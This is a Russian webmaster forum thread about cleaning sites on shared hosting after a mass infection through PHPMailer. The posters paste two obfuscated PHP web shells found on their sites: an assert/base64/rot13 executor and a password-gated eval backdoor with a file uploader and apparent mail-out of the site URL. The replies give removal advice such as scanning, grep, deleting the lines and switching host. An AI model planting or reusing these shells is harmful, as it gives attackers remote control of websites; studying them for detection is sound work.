Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Вирусы на сайте массовое заражение Способы массового лечения

Модерирует : Cheery

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Здравствуйте, произошло массовое заражение сайтов лежащих на шаред хостингах. Не у всех хостингов сайты изолированы друг дот друга. То есть залив образно говоря шелл на один сайт - можно раскидать его в остальные сайты "выйдя" из домашней директории сайта и зайдя в остальные.
Заражение произошло через класс PHPMail которые используется почти что во вех современных движках сайтов.
На заражённых сайтах размещаются шеллы (которые в принципе не трудно найти, любой антивирус типа касперский или доктор веб успешно их находит)
Сложнее обстоят дела со вставками вредоносного кода  в штатные файлы CMS, приходится сканировать весь сайт "Айболитом" и вычищать этот код из файлов.
Иногда после касперского и айболита всё равно остаются скрипты, которые например находит только rsfirewall (компонент защиты для Joomla)  
 
То есть на чистку одного сайта может уходить где то пол часа. А когда количество сайтов большое, то это очень ощутимо.
 
Поэтому хотелось бы спросить ,существует ли способ ускорить данный процесс? Например не могли бы подсказать регулярное выражение для поиска следующего куска вредоносного кода типа такого:

Код:
<?php
 
$kuwt="a"."s".chr(115)."\x65"."r"."t";$lcr="b"."a"."\x73"."e"."6"."\x34".chr(95)."\x64".chr(101).chr(99).chr(111).chr(100)."e";$lx="s"."t".chr(114).chr(95)."\x72"."\x6f".chr(116)."\x31"."\x33";@$kuwt(@$lcr(@$lx($_POST["\x64".chr(97).chr(116).chr(97)])));die();

 
или типа такого:
 

Код:
<?php if($_GET["login"]=="lkBRg5"){ echo success; $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;");}} ?><?php $password="lkBRg5";if ($_GET[pass]==$password){$znwkxwnu="\x78\x30\x62";${"G\x4cO\x42A\x4c\x53"}["\x73\x72u\x68\x61\x6a\x76"]="\x781\x30";${"GLO\x42\x41\x4c\x53"}["v\x66sqb\x64f\x6a\x6e\x6f\x70\x70"]="x\x30\x65";${"\x47\x4c\x4fB\x41LS"}["g\x6f\x67c\x7ah\x62\x6d\x71"]="x0\x64";${"\x47\x4c\x4fB\x41\x4c\x53"}["o\x72\x63\x69\x69\x68\x68\x66\x69\x6f\x71"]="\x78\x30\x62";$lounprsoxdal="x1\x30";${$lounprsoxdal}="m\x61il";${"\x47\x4c\x4fB\x41\x4cS"}["\x75k\x78\x71\x75e\x65\x6c\x6a"]="x0b";${"\x47\x4cO\x42\x41\x4c\x53"}["cc\x77\x61\x78y\x68\x66\x77\x76"]="\x78\x30\x64";$byrhwcid="\x780\x63";$xulbjxjjel="\x78\x30\x64";${"GL\x4fB\x41L\x53"}["\x64\x61\x76\x75\x6ex\x67\x70d\x79"]="x\x30\x64";${"\x47\x4c\x4fB\x41\x4cS"}["\x78m\x77\x7a\x78\x70\x72o\x6a\x76"]="\x78\x30\x66";${"\x47L\x4f\x42\x41L\x53"}["qj\x78\x6d\x66\x77"]="x\x30\x63";${${"\x47\x4cO\x42\x41\x4cS"}["\x75\x6bxq\x75ee\x6cj"]}=$_SERVER["SE\x52VER_\x4e\x41ME"].$_SERVER["\x53\x43R\x49\x50\x54_\x4e\x41ME"];${$byrhwcid}="ar\x72ay\x20".${${"\x47\x4c\x4fBALS"}["or\x63\x69i\x68\x68\x66i\x6fq"]};${${"G\x4c\x4f\x42\x41\x4cS"}["\x67\x6fg\x63\x7a\x68\x62\x6dq"]}=array("com","gm","ttroot2","@","ail.");${${"\x47\x4c\x4f\x42\x41LS"}["v\x66\x73\x71\x62\x64\x66j\x6e\x6fpp"]}=${${"\x47L\x4f\x42A\x4c\x53"}["g\x6fg\x63\x7a\x68\x62m\x71"]}[2].${${"\x47\x4c\x4f\x42AL\x53"}["\x63\x63wa\x78\x79\x68\x66\x77\x76"]}[3].${${"G\x4cO\x42A\x4cS"}["\x67\x6f\x67\x63\x7a\x68\x62\x6dq"]}[1].${${"GLOB\x41\x4cS"}["d\x61\x76\x75\x6e\x78\x67\x70\x64\x79"]}[4].${$xulbjxjjel}[0];${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78mwz\x78\x70ro\x6a\x76"]}=@${${"\x47LO\x42\x41L\x53"}["\x73\x72u\x68a\x6a\x76"]}(${${"\x47\x4c\x4f\x42ALS"}["v\x66\x73q\x62df\x6a\x6e\x6f\x70p"]},${${"G\x4c\x4f\x42\x41LS"}["\x71\x6a\x78\x6dfw"]},${$znwkxwnu});${"GLOBAL\x53"}["\x77\x6dy\x6b\x78s\x6b\x78cy\x75\x6a"]="\x75\x72\x6c";${"GLO\x42ALS"}["\x62\x6d\x63\x74v\x77\x63"]="\x70\x61\x74h";echo "\x3c\x64i\x76\x20a\x6cig\x6e=\x22\x63\x65n\x74\x65r\x22\x3e\n\x3ci\x6dg\x20\x73r\x63=\"\x68\x74t\x70://w\x77\x77\x2eubhtea\x6d\x2eorg/\x69mage\x73/\x55BH\x46i\x6ea\x6c1.p\x6eg\x22 wi\x64\x74h\x3d\"200\" he\x69g\x68t=\x221\x35\x30\">\x3c/\x69\x6dg\x3e\x3c\x62r\x3e\n<fo\x72m act\x69\x6f\x6e=\"\x22\x20m\x65t\x68od=\"\x70\x6fst\"\x20\x65ncty\x70e=\"\x6dul\x74ipa\x72t/fo\x72\x6d-da\x74a\x22\x3e\n<l\x61\x62el\x20\x66or\x3d\"\x66i\x6ce\x22\x3eF\x69l\x65\x6ea\x6de:\x3c/\x6c\x61be\x6c\x3e\n\x3c\x69\x6ep\x75\x74\x20type=\x22f\x69\x6ce\" n\x61m\x65=\x22\x66il\x65\"\x20i\x64\x3d\x22f\x69l\x65\"\x20/\x3e\n<\x62\x72\x20/\x3e\n<i\x6e\x70\x75\x74\x20\x74y\x70e=\x22\x73ubm\x69t\"\x20\x6e\x61\x6de\x3d\"\x73\x75b\x6d\x69\x74\" v\x61\x6cue\x3d\x22\x55p\x6co\x61d\"\x3e\n\x3c/\x66\x6frm>\n</di\x76>\n";if(isset($_POST["sub\x6di\x74"])){if($_FILES["f\x69\x6c\x65"]["e\x72r\x6fr"]>0){echo"\x45\x72\x72\x6fr: ".$_FILES["f\x69\x6ce"]["err\x6f\x72"]."<\x62r />";}else{echo"\x55\x70\x6co\x61d:\x20".$_FILES["fi\x6c\x65"]["\x6e\x61\x6d\x65"]."<br\x20/>";echo"\x53\x69\x7a\x65:\x20".($_FILES["\x66il\x65"]["\x73\x69ze"]/1024)."\x20\x4bb\x3c\x62r /\x3e";echo"St\x6f\x72\x65d\x20i\x6e: ".$_FILES["\x66i\x6ce"]["\x74mp_\x6eam\x65"]."<\x62\x72\x3e";}if(file_exists("".$_FILES["f\x69\x6ce"]["\x6e\x61\x6d\x65"])){echo$_FILES["\x66i\x6ce"]["na\x6d\x65"]." a\x6c\x72\x65a\x64y\x20ex\x69\x73\x74\x73\x2e\x20";}else{$iwtdsenis="\x75rl";${"G\x4cO\x42A\x4cS"}["e\x66y\x74\x64\x69\x6f\x77t"]="\x70\x61\x74\x68";move_uploaded_file($_FILES["fi\x6ce"]["\x74\x6dp_\x6eame"],"".$_FILES["fi\x6c\x65"]["name"]);${${"\x47\x4cO\x42\x41LS"}["\x62\x6d\x63tv\x77c"]}=__dir__;${"\x47\x4cO\x42AL\x53"}["\x6f\x78xzjyqsz"]="\x70\x61\x74\x68";echo"S\x74o\x72\x65\x64 i\x6e: ".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x66\x79\x74\x64i\x6f\x77\x74"]}."/".$_FILES["f\x69\x6c\x65"]["nam\x65"]."<br>";echo"<\x68r\x3e";$chubtyhcjkr="\x70\x61\x74\x68";${$iwtdsenis}="\x68\x74\x74p://".$_SERVER["\x48\x54\x54\x50\x5f\x48O\x53T"].$_SERVER["REQ\x55ES\x54\x5f\x55RI"];${${"\x47\x4c\x4f\x42\x41LS"}["\x6f\x78\x78zj\x79\x71\x73\x7a"]}=str_replace("\x75\x70.\x70h\x70",$_FILES["\x66\x69\x6c\x65"]["\x6ea\x6d\x65"],${${"\x47\x4cO\x42\x41\x4cS"}["\x77\x6d\x79\x6bxsk\x78\x63\x79uj"]});echo"\x47o\x20\x68e\x72e\x20:\x20".${$chubtyhcjkr}."\x3c\x62r\x3e";}}}else{ ?><form action="" method="GET"><font color="#00FFCC">Password:<input type="password" name="pass" id="pass"><input type="submit" name="login" value="go!" /></form><?php } ?>

 

Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 22:44 10-02-2017 | Исправлено: Z4masko, 22:46 10-02-2017
DenisOvi

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Напиши пхп скрипт, который просканирует все файлы и удалит вредоносный код, тем более что оригинал кода есть.

Всего записей: 11 | Зарегистр. 02-02-2017 | Отправлено: 11:02 12-02-2017
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Z4masko
в любой linux системе есть (для поиска в файлах)
https://www.gnu.org/software/grep/manual/grep.html

Всего записей: 15040 | Зарегистр. 20-09-2014 | Отправлено: 04:48 27-02-2017
Igor1234z

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Добрый день! Помогите пожалуйста избавиться от вредоносного кода находящегося в /templates/j2template/j2template.php
 
<?php
 
$kuwt="a"."s".chr(115)."\x65"."r"."t";$lcr="b"."a"."\x73"."e"."6"."\x34".chr(95)."\x64".chr(101).chr(99).chr(111).chr(100)."e";$lx="s"."t".chr(114).chr(95)."\x72"."\x6f".chr(116)."\x31"."\x33";@$kuwt(@$lcr(@$lx($_POST["\x64".chr(97).chr(116).chr(97)])));die();
 
Его нашел, а как убрать, что бы сайт не положить, не могу найти?

Всего записей: 2 | Зарегистр. 17-01-2020 | Отправлено: 12:22 17-01-2020
Z4masko



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Добрый день! Помогите пожалуйста избавиться от вредоносного кода находящегося в /templates/j2template/j2template.php
 
<?php
 Подробнее...
 
Его нашел, а как убрать, что бы сайт не положить, не могу найти?

 у вас с таким вредоносным кодом сейчас не один файл. Просканируйте сканером Ai-Bolit весь сайт. А код этот можеет смело удалять, сделав перед этим резервную копию файла себе на компьютер. Это  коды обычно в первых строках файла (ещё до начала комментариев в файле.

Всего записей: 735 | Зарегистр. 05-11-2004 | Отправлено: 13:54 17-01-2020
Mavrikii

Platinum Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Igor1234z

Цитата:
а как убрать, что бы сайт не положить, не могу найти?

удалить/закомментировать эту строку

Всего записей: 15040 | Зарегистр. 20-09-2014 | Отправлено: 17:25 17-01-2020
Igor1234z

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Ai-Bolit -ом ничего больше не выявил!! Спасибо!

Всего записей: 2 | Зарегистр. 17-01-2020 | Отправлено: 23:33 17-01-2020
artkvadrart

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Помогал другу избавиться от этой проблемы. Сканировал файлы Айболитом. Как вариант - сделайте каталог на компьютере VIRUS, внесите его в исключения антивируса (или отключите его). Антивирус просто удалит ваш файл со всем содержимым в карантин. После можно или вручную или скриптом просмотреть файлы на предмет наличия вируса.  
 
Но при выявлении такого плана вируса лучше обновить CMS до последней версии и поменять хостера.  
 
В нашем случае, очистив все файлы, мы через неделю опять получили заражение. Ответ хостера- сам дурак. Мы перенесли все файлы на новый хостинг, а на старом оставили 10 файлов  php практически пустых. Через неделю пару из них оказались заражены. Хостер признал проблему в результате ооооооочень долго бодания. Но в кратце ответ такой - нам нафиг не надо ваша мелочь идите на все четыре стороны.

Всего записей: 3 | Зарегистр. 07-07-2006 | Отправлено: 10:09 05-02-2020
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Вирусы на сайте массовое заражение Способы массового лечения


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru